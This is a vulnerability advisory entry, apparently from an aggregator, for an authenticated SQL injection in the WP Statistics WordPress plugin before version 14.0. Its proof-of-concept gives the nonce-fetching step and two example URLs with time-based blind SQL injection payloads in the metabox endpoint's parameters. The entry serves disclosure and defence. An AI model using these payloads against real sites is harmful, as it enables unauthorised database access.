Lucene search

K

WpvulndbWPVDB-ID:18B7E93F-B038-4F28-918B-4015D62F0EB8

HistoryMar 06, 2023 - 12:00 a.m.

WP Statistics < 14.0 - Authenticated SQLi

2023-03-0600:00:00

wpscan.com

15

wp statistics

authenticated

sql injection

settings

roles

nonce

delay

EPSS

0.001

Percentile

31.1%

The plugin does not escape a parameter, which could allow authenticated users to perform SQL Injection attacks. By default, the affected feature is available to users with the manage_options capability (admin+), however the plugin has a settings to allow low privilege users to access it as well.

PoC

Log in as a user allowed to View WP Statistic (by default admins, but this can be changed in Statistic > Settings > Roles) and get a nonce via https://a.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URLs below, which will result in a 6s delay https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name;=pages-chart&ago;=1&type;=a' AND (SELECT 42 FROM (SELECT(SLEEP(2)))Ab)–%20Cd https://a.com/wp-json/wp-statistics/v2/metabox?_wpnonce=XXXX&name;=pages-chart&ago;=1&ID;=1 AND (SELECT 42 FROM (SELECT(SLEEP(2)))Ab)–%20Cd

EPSS

0.001

Percentile

31.1%

Related for WPVDB-ID:18B7E93F-B038-4F28-918B-4015D62F0EB8

prion1 cve1 wpexploit1 nvd1 osv1 cvelist1 openvas1 wordfence1